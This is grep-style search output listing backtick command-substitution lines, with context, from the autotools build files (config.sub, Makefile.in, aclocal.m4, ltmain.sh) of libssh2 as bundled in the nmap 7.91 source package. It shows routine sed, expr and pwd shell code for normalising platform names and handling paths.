nmap-7.91+dfsg1/libssh2/config.sub-652-		os=$os"spe"
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-754-	i*86v32)
nmap-7.91+dfsg1/libssh2/config.sub:755:		basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-756-		os=-sysv32
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-758-	i*86v4*)
nmap-7.91+dfsg1/libssh2/config.sub:759:		basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-760-		os=-sysv4
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-762-	i*86v)
nmap-7.91+dfsg1/libssh2/config.sub:763:		basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-764-		os=-sysv
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-766-	i*86sol2)
nmap-7.91+dfsg1/libssh2/config.sub:767:		basic_machine=`echo "$1" | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/libssh2/config.sub-768-		os=-solaris2
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-792-	leon-*|leon[3-9]-*)
nmap-7.91+dfsg1/libssh2/config.sub:793:		basic_machine=sparc-`echo "$basic_machine" | sed 's/-.*//'`
nmap-7.91+dfsg1/libssh2/config.sub-794-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-799-	m68knommu-*)
nmap-7.91+dfsg1/libssh2/config.sub:800:		basic_machine=m68k-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-801-		os=-linux
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-833-	mips3*-*)
nmap-7.91+dfsg1/libssh2/config.sub:834:		basic_machine=`echo "$basic_machine" | sed -e 's/mips3/mips64/'`
nmap-7.91+dfsg1/libssh2/config.sub-835-		;;
nmap-7.91+dfsg1/libssh2/config.sub-836-	mips3*)
nmap-7.91+dfsg1/libssh2/config.sub:837:		basic_machine=`echo "$basic_machine" | sed -e 's/mips3/mips64/'`-unknown
nmap-7.91+dfsg1/libssh2/config.sub-838-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-855-	ms1-*)
nmap-7.91+dfsg1/libssh2/config.sub:856:		basic_machine=`echo "$basic_machine" | sed -e 's/ms1-/mt-/'`
nmap-7.91+dfsg1/libssh2/config.sub-857-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-980-	parisc-*)
nmap-7.91+dfsg1/libssh2/config.sub:981:		basic_machine=hppa-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-982-		os=-linux
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-996-	pc98-*)
nmap-7.91+dfsg1/libssh2/config.sub:997:		basic_machine=i386-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-998-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1011-	pentium-* | p5-* | k5-* | k6-* | nexgen-* | viac3-*)
nmap-7.91+dfsg1/libssh2/config.sub:1012:		basic_machine=i586-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1013-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1014-	pentiumpro-* | p6-* | 6x86-* | athlon-*)
nmap-7.91+dfsg1/libssh2/config.sub:1015:		basic_machine=i686-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1016-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1017-	pentiumii-* | pentium2-* | pentiumiii-* | pentium3-*)
nmap-7.91+dfsg1/libssh2/config.sub:1018:		basic_machine=i686-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1019-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1020-	pentium4-*)
nmap-7.91+dfsg1/libssh2/config.sub:1021:		basic_machine=i786-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1022-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1030-	ppc-* | ppcbe-*)
nmap-7.91+dfsg1/libssh2/config.sub:1031:		basic_machine=powerpc-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1032-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1036-	ppcle-* | powerpclittle-*)
nmap-7.91+dfsg1/libssh2/config.sub:1037:		basic_machine=powerpcle-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1038-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1040-		;;
nmap-7.91+dfsg1/libssh2/config.sub:1041:	ppc64-*) basic_machine=powerpc64-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1042-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1046-	ppc64le-* | powerpc64little-*)
nmap-7.91+dfsg1/libssh2/config.sub:1047:		basic_machine=powerpc64le-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1048-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1122-	strongarm-* | thumb-*)
nmap-7.91+dfsg1/libssh2/config.sub:1123:		basic_machine=arm-`echo "$basic_machine" | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub-1124-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1255-	xscale-* | xscalee[bl]-*)
nmap-7.91+dfsg1/libssh2/config.sub:1256:		basic_machine=`echo "$basic_machine" | sed 's/^xscale/arm/'`
nmap-7.91+dfsg1/libssh2/config.sub-1257-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1317-	*)
nmap-7.91+dfsg1/libssh2/config.sub:1318:		echo Invalid configuration \`"$1"\': machine \`"$basic_machine"\' not recognized 1>&2
nmap-7.91+dfsg1/libssh2/config.sub-1319-		exit 1
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1325-	*-digital*)
nmap-7.91+dfsg1/libssh2/config.sub:1326:		basic_machine=`echo "$basic_machine" | sed 's/digital.*/dec/'`
nmap-7.91+dfsg1/libssh2/config.sub-1327-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1328-	*-commodore*)
nmap-7.91+dfsg1/libssh2/config.sub:1329:		basic_machine=`echo "$basic_machine" | sed 's/commodore.*/cbm/'`
nmap-7.91+dfsg1/libssh2/config.sub-1330-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1346-	-solaris1 | -solaris1.*)
nmap-7.91+dfsg1/libssh2/config.sub:1347:		os=`echo $os | sed -e 's|solaris1|sunos4|'`
nmap-7.91+dfsg1/libssh2/config.sub-1348-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1355-	-gnu/linux*)
nmap-7.91+dfsg1/libssh2/config.sub:1356:		os=`echo $os | sed -e 's|gnu/linux|linux-gnu|'`
nmap-7.91+dfsg1/libssh2/config.sub-1357-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1407-	-nto*)
nmap-7.91+dfsg1/libssh2/config.sub:1408:		os=`echo $os | sed -e 's|nto|nto-qnx|'`
nmap-7.91+dfsg1/libssh2/config.sub-1409-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1414-	-mac*)
nmap-7.91+dfsg1/libssh2/config.sub:1415:		os=`echo "$os" | sed -e 's|mac|macos|'`
nmap-7.91+dfsg1/libssh2/config.sub-1416-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1420-	-linux*)
nmap-7.91+dfsg1/libssh2/config.sub:1421:		os=`echo $os | sed -e 's|linux|linux-gnu|'`
nmap-7.91+dfsg1/libssh2/config.sub-1422-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1423-	-sunos5*)
nmap-7.91+dfsg1/libssh2/config.sub:1424:		os=`echo "$os" | sed -e 's|sunos5|solaris2|'`
nmap-7.91+dfsg1/libssh2/config.sub-1425-		;;
nmap-7.91+dfsg1/libssh2/config.sub-1426-	-sunos6*)
nmap-7.91+dfsg1/libssh2/config.sub:1427:		os=`echo "$os" | sed -e 's|sunos6|solaris3|'`
nmap-7.91+dfsg1/libssh2/config.sub-1428-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1469-	-sinix5.*)
nmap-7.91+dfsg1/libssh2/config.sub:1470:		os=`echo $os | sed -e 's|sinix|sysv|'`
nmap-7.91+dfsg1/libssh2/config.sub-1471-		;;
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1528-		# Get rid of the `-' at the beginning of $os.
nmap-7.91+dfsg1/libssh2/config.sub:1529:		os=`echo $os | sed 's/[^-]*-//'`
nmap-7.91+dfsg1/libssh2/config.sub:1530:		echo Invalid configuration \`"$1"\': system \`"$os"\' not recognized 1>&2
nmap-7.91+dfsg1/libssh2/config.sub-1531-		exit 1
##############################################
nmap-7.91+dfsg1/libssh2/config.sub-1788-		esac
nmap-7.91+dfsg1/libssh2/config.sub:1789:		basic_machine=`echo "$basic_machine" | sed "s/unknown/$vendor/"`
nmap-7.91+dfsg1/libssh2/config.sub-1790-		;;
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-51-  { \
nmap-7.91+dfsg1/libssh2/Makefile.in:52:    flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-53-  }; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-138-  esac
nmap-7.91+dfsg1/libssh2/Makefile.in:139:am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`;
nmap-7.91+dfsg1/libssh2/Makefile.in-140-am__vpath_adj = case $$p in \
nmap-7.91+dfsg1/libssh2/Makefile.in:141:    $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \
nmap-7.91+dfsg1/libssh2/Makefile.in-142-    *) f=$$p;; \
nmap-7.91+dfsg1/libssh2/Makefile.in-143-  esac;
nmap-7.91+dfsg1/libssh2/Makefile.in:144:am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`;
nmap-7.91+dfsg1/libssh2/Makefile.in-145-am__install_max = 40
nmap-7.91+dfsg1/libssh2/Makefile.in-146-am__nobase_strip_setup = \
nmap-7.91+dfsg1/libssh2/Makefile.in:147:  srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`
nmap-7.91+dfsg1/libssh2/Makefile.in-148-am__nobase_strip = \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-219-  while test -n "$$dir1"; do \
nmap-7.91+dfsg1/libssh2/Makefile.in:220:    first=`echo "$$dir1" | sed -e "$$sed_first"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-221-    if test "$$first" != "."; then \
nmap-7.91+dfsg1/libssh2/Makefile.in-222-      if test "$$first" = ".."; then \
nmap-7.91+dfsg1/libssh2/Makefile.in:223:        dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \
nmap-7.91+dfsg1/libssh2/Makefile.in:224:        dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-225-      else \
nmap-7.91+dfsg1/libssh2/Makefile.in:226:        first2=`echo "$$dir2" | sed -e "$$sed_first"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-227-        if test "$$first2" = "$$first"; then \
nmap-7.91+dfsg1/libssh2/Makefile.in:228:          dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-229-        else \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-234-    fi; \
nmap-7.91+dfsg1/libssh2/Makefile.in:235:    dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-236-  done; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-515-	@list='$(pkgconfig_DATA)'; test -n "$(pkgconfigdir)" || list=; \
nmap-7.91+dfsg1/libssh2/Makefile.in:516:	files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-517-	dir='$(DESTDIR)$(pkgconfigdir)'; $(am__uninstall_files_from_dir)
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-536-	@list='$(include_HEADERS)'; test -n "$(includedir)" || list=; \
nmap-7.91+dfsg1/libssh2/Makefile.in:537:	files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-538-	dir='$(DESTDIR)$(includedir)'; $(am__uninstall_files_from_dir)
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-553-	dot_seen=no; \
nmap-7.91+dfsg1/libssh2/Makefile.in:554:	target=`echo $@ | sed s/-recursive//`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-555-	case "$@" in \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-616-GTAGS:
nmap-7.91+dfsg1/libssh2/Makefile.in:617:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libssh2/Makefile.in-618-	  && $(am__cd) $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-651-	test -d "$(distdir)" || mkdir "$(distdir)"
nmap-7.91+dfsg1/libssh2/Makefile.in:652:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libssh2/Makefile.in:653:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-654-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-665-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libssh2/Makefile.in:666:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-667-	    if test -d "$(distdir)/$$file"; then \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-779-	test -d $(distdir)/_build || exit 0; \
nmap-7.91+dfsg1/libssh2/Makefile.in:780:	dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \
nmap-7.91+dfsg1/libssh2/Makefile.in-781-	  && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-823-	}; \
nmap-7.91+dfsg1/libssh2/Makefile.in:824:	test `$(am__distuninstallcheck_listfiles) | wc -l` -eq 0 \
nmap-7.91+dfsg1/libssh2/Makefile.in-825-	   || { echo "ERROR: files left after uninstall:" ; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-835-	fi
nmap-7.91+dfsg1/libssh2/Makefile.in:836:	@test `$(distcleancheck_listfiles) | wc -l` -eq 0 \
nmap-7.91+dfsg1/libssh2/Makefile.in-837-	  || { echo "ERROR: files left in build directory after distclean:" ; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-978-	find $(distdir) -name "*.dist" -exec rm {} \;
nmap-7.91+dfsg1/libssh2/Makefile.in:979:	(distit=`find $(srcdir) -name "*.dist"`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-980-	for file in $$distit; do \
nmap-7.91+dfsg1/libssh2/Makefile.in:981:	  strip=`echo $$file | sed -e s/^$(srcdir)// -e s/\.dist//`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-982-	  cp $$file $(distdir)$$strip; \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-1014-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/libssh2/Makefile.in:1015:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-1016-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-1026-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/libssh2/Makefile.in:1027:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-1028-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-1046-	win32_srcs='$(WIN32SOURCES)'; \
nmap-7.91+dfsg1/libssh2/Makefile.in:1047:	sorted_srcs=`for file in $$win32_srcs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-1048-	for file in $$sorted_srcs; do \
##############################################
nmap-7.91+dfsg1/libssh2/Makefile.in-1052-	win32_hdrs='$(WIN32HEADERS)'; \
nmap-7.91+dfsg1/libssh2/Makefile.in:1053:	sorted_hdrs=`for file in $$win32_hdrs; do echo $$file; done | sort`; \
nmap-7.91+dfsg1/libssh2/Makefile.in-1054-	for file in $$sorted_hdrs; do \
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-92-# iff we strip the leading $srcdir from $ac_aux_dir.  That would be:
nmap-7.91+dfsg1/libssh2/aclocal.m4:93:#   am_aux_dir='\$(top_srcdir)/'`expr "$ac_aux_dir" : "$srcdir//*\(.*\)"`
nmap-7.91+dfsg1/libssh2/aclocal.m4-94-# and then we would define $MISSING as
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-107-# Expand $ac_aux_dir to an absolute path.
nmap-7.91+dfsg1/libssh2/aclocal.m4:108:am_aux_dir=`cd "$ac_aux_dir" && pwd`
nmap-7.91+dfsg1/libssh2/aclocal.m4-109-])
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-205-  if test "$am_compiler_list" = ""; then
nmap-7.91+dfsg1/libssh2/aclocal.m4:206:     am_compiler_list=`sed -n ['s/^#*\([a-zA-Z0-9]*\))$/\1/p'] < ./depcomp`
nmap-7.91+dfsg1/libssh2/aclocal.m4-207-  fi
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-358-    # Strip MF so we end up with the name of the file.
nmap-7.91+dfsg1/libssh2/aclocal.m4:359:    am_mf=`AS_ECHO(["$am_mf"]) | sed -e 's/:.*$//'`
nmap-7.91+dfsg1/libssh2/aclocal.m4-360-    # Check whether this is an Automake generated Makefile which includes
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-365-      || continue
nmap-7.91+dfsg1/libssh2/aclocal.m4:366:    am_dirpart=`AS_DIRNAME(["$am_mf"])`
nmap-7.91+dfsg1/libssh2/aclocal.m4:367:    am_filepart=`AS_BASENAME(["$am_mf"])`
nmap-7.91+dfsg1/libssh2/aclocal.m4-368-    AM_RUN_LOG([cd "$am_dirpart" \
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-433-AC_REQUIRE([AC_PROG_INSTALL])dnl
nmap-7.91+dfsg1/libssh2/aclocal.m4:434:if test "`cd $srcdir && pwd`" != "`pwd`"; then
nmap-7.91+dfsg1/libssh2/aclocal.m4-435-  # Use -I$(srcdir) only when $(srcdir) != ., so that make's output
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-592-    * )
nmap-7.91+dfsg1/libssh2/aclocal.m4:593:      _am_stamp_count=`expr $_am_stamp_count + 1` ;;
nmap-7.91+dfsg1/libssh2/aclocal.m4-594-  esac
nmap-7.91+dfsg1/libssh2/aclocal.m4-595-done
nmap-7.91+dfsg1/libssh2/aclocal.m4:596:echo "timestamp for $_am_arg" >`AS_DIRNAME(["$_am_arg"])`/stamp-h[]$_am_stamp_count])
nmap-7.91+dfsg1/libssh2/aclocal.m4-597-
##############################################
nmap-7.91+dfsg1/libssh2/aclocal.m4-884-     echo "timestamp, slept: $am_has_slept" > conftest.file
nmap-7.91+dfsg1/libssh2/aclocal.m4:885:     set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null`
nmap-7.91+dfsg1/libssh2/aclocal.m4-886-     if test "$[*]" = "X"; then
nmap-7.91+dfsg1/libssh2/aclocal.m4-887-	# -L didn't work.
nmap-7.91+dfsg1/libssh2/aclocal.m4:888:	set X `ls -t "$srcdir/configure" conftest.file`
nmap-7.91+dfsg1/libssh2/aclocal.m4-889-     fi
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-103-#
nmap-7.91+dfsg1/libssh2/ltmain.sh:104:#   . `echo "$0" | ${SED-sed} 's|[^/]*$||'`/build-aux/funclib.sh
nmap-7.91+dfsg1/libssh2/ltmain.sh-105-#
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-202-          func_executable_p "$_G_path_prog" || continue
nmap-7.91+dfsg1/libssh2/ltmain.sh:203:          case `"$_G_path_prog" --version 2>&1` in
nmap-7.91+dfsg1/libssh2/ltmain.sh-204-            *GNU*) func_path_progs_result=$_G_path_prog _G_path_prog_found=: ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-249-      diff conftest.out conftest.nl >/dev/null 2>&1 || break
nmap-7.91+dfsg1/libssh2/ltmain.sh:250:      _G_count=`expr $_G_count + 1`
nmap-7.91+dfsg1/libssh2/ltmain.sh-251-      if test "$_G_count" -gt "$_G_path_prog_max"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-285-      diff conftest.out conftest.nl >/dev/null 2>&1 || break
nmap-7.91+dfsg1/libssh2/ltmain.sh:286:      _G_count=`expr $_G_count + 1`
nmap-7.91+dfsg1/libssh2/ltmain.sh-287-      if test "$_G_count" -gt "$_G_path_prog_max"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-410-# The name of this program.
nmap-7.91+dfsg1/libssh2/ltmain.sh:411:progname=`$ECHO "$progpath" |$SED "$sed_basename"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-412-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-416-  *[\\/]*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:417:     progdir=`$ECHO "$progpath" |$SED "$sed_dirname"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:418:     progdir=`cd "$progdir" && pwd`
nmap-7.91+dfsg1/libssh2/ltmain.sh-419-     progpath=$progdir/$progname
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-610-
nmap-7.91+dfsg1/libssh2/ltmain.sh:611:    eval _G_current_value='`$ECHO $'$1'`'
nmap-7.91+dfsg1/libssh2/ltmain.sh:612:    _G_delim=`expr "$2" : '\(.\)'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-613-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-639-
nmap-7.91+dfsg1/libssh2/ltmain.sh:640:    func_arith_result=`expr "$@"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-641-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-660-  # ...otherwise fall back to using sed.
nmap-7.91+dfsg1/libssh2/ltmain.sh:661:  _b='func_basename_result=`$ECHO "$1" |$SED "$sed_basename"`'
nmap-7.91+dfsg1/libssh2/ltmain.sh:662:  _d='func_dirname_result=`$ECHO "$1"  |$SED "$sed_dirname"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-663-      if test "X$func_dirname_result" = "X$1"; then
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-757-      test -n "$_G_tc" && {
nmap-7.91+dfsg1/libssh2/ltmain.sh:758:        _G_esc_tc=`$ECHO "$_G_tc" | $SED "$sed_make_literal_regex"`
nmap-7.91+dfsg1/libssh2/ltmain.sh:759:        _G_indent=`$ECHO "$_G_indent" | $SED "s|$_G_esc_tc||g"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-760-      }
nmap-7.91+dfsg1/libssh2/ltmain.sh-761-    done
nmap-7.91+dfsg1/libssh2/ltmain.sh:762:    _G_indent="$progname: "`echo "$_G_indent" | $SED 's|.| |g'`"  " ## exclude from sc_prohibit_nested_quotes
nmap-7.91+dfsg1/libssh2/ltmain.sh-763-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-831-
nmap-7.91+dfsg1/libssh2/ltmain.sh:832:    func_len_result=`expr "$1" : ".*" 2>/dev/null || echo $max_cmd_len`
nmap-7.91+dfsg1/libssh2/ltmain.sh-833-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-863-        # ...otherwise throw away the child directory and loop
nmap-7.91+dfsg1/libssh2/ltmain.sh:864:        _G_directory_path=`$ECHO "$_G_directory_path" | $SED -e "$sed_dirname"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-865-      done
nmap-7.91+dfsg1/libssh2/ltmain.sh:866:      _G_dir_list=`$ECHO "$_G_dir_list" | $SED 's|:*$||'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-867-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-901-      # If mktemp works, use that first and foremost
nmap-7.91+dfsg1/libssh2/ltmain.sh:902:      _G_tmpdir=`mktemp -d "$_G_template-XXXXXXXX" 2>/dev/null`
nmap-7.91+dfsg1/libssh2/ltmain.sh-903-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1111-        *[\\\`\"\$]*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:1112:	  _G_unquoted_arg=`printf '%s\n' "$1" |$SED "$sed_quote_subst"` ;;
nmap-7.91+dfsg1/libssh2/ltmain.sh-1113-        *)
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1198-    case $2 in
nmap-7.91+dfsg1/libssh2/ltmain.sh:1199:      .*) func_stripname_result=`$ECHO "$3" | $SED -e "s%^$1%%" -e "s%\\\\$2\$%%"`;;
nmap-7.91+dfsg1/libssh2/ltmain.sh:1200:      *)  func_stripname_result=`$ECHO "$3" | $SED -e "s%^$1%%" -e "s%$2\$%%"`;;
nmap-7.91+dfsg1/libssh2/ltmain.sh-1201-    esac
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1271-    [0-9]* | *[!a-zA-Z0-9_]*)
nmap-7.91+dfsg1/libssh2/ltmain.sh:1272:      func_tr_sh_result=`$ECHO "$1" | $SED -e 's/^\([0-9]\)/_\1/' -e 's/[^a-zA-Z0-9_]/_/g'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-1273-      ;;
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1358-
nmap-7.91+dfsg1/libssh2/ltmain.sh:1359:    test "x$1" = x`func_sort_ver "$1" "$2" | $SED 1q`
nmap-7.91+dfsg1/libssh2/ltmain.sh-1360-}
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1424-# The default options also support '--debug', which will turn on shell
nmap-7.91+dfsg1/libssh2/ltmain.sh:1425:# execution tracing (see the comment above debug_cmd below for another
nmap-7.91+dfsg1/libssh2/ltmain.sh-1426-# use), and '--verbose' and the func_verbose function to allow your script
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1517-
nmap-7.91+dfsg1/libssh2/ltmain.sh:1518:    eval ${1}_hooks='`$ECHO "\$'$1'_hooks" |$SED "s| '$2'||"`'
nmap-7.91+dfsg1/libssh2/ltmain.sh-1519-}
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1943-
nmap-7.91+dfsg1/libssh2/ltmain.sh:1944:      func_split_equals_lhs=`expr "x$1" : 'x\([^=]*\)'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-1945-      func_split_equals_rhs=
nmap-7.91+dfsg1/libssh2/ltmain.sh-1946-      test "x$func_split_equals_lhs" = "x$1" \
nmap-7.91+dfsg1/libssh2/ltmain.sh:1947:        || func_split_equals_rhs=`expr "x$1" : 'x[^=]*=\(.*\)$'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-1948-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-1971-
nmap-7.91+dfsg1/libssh2/ltmain.sh:1972:      func_split_short_opt_name=`expr "x$1" : 'x-\(.\)'`
nmap-7.91+dfsg1/libssh2/ltmain.sh:1973:      func_split_short_opt_arg=`expr "x$1" : 'x-.\(.*\)$'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-1974-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2144-       version:        $progname $scriptversion Debian-2.4.6-10
nmap-7.91+dfsg1/libssh2/ltmain.sh:2145:       automake:       `($AUTOMAKE --version) 2>/dev/null |$SED 1q`
nmap-7.91+dfsg1/libssh2/ltmain.sh:2146:       autoconf:       `($AUTOCONF --version) 2>/dev/null |$SED 1q`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2147-
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2183-  {
nmap-7.91+dfsg1/libssh2/ltmain.sh:2184:    func_lo2o_result=`$ECHO "$1" | $SED "$lo2o"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2185-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2188-  {
nmap-7.91+dfsg1/libssh2/ltmain.sh:2189:    func_xform_result=`$ECHO "$1" | $SED 's|\.[^.]*$|.lo|'`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2190-  }
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2279-	  # quotes we have to do it in 2 steps:
nmap-7.91+dfsg1/libssh2/ltmain.sh:2280:	  extractedcf=`$SED -n -e "$sed_extractcf" < "$progpath"`
nmap-7.91+dfsg1/libssh2/ltmain.sh-2281-	  eval "$extractedcf"
##############################################
nmap-7.91+dfsg1/libssh2/ltmain.sh-2751-      done
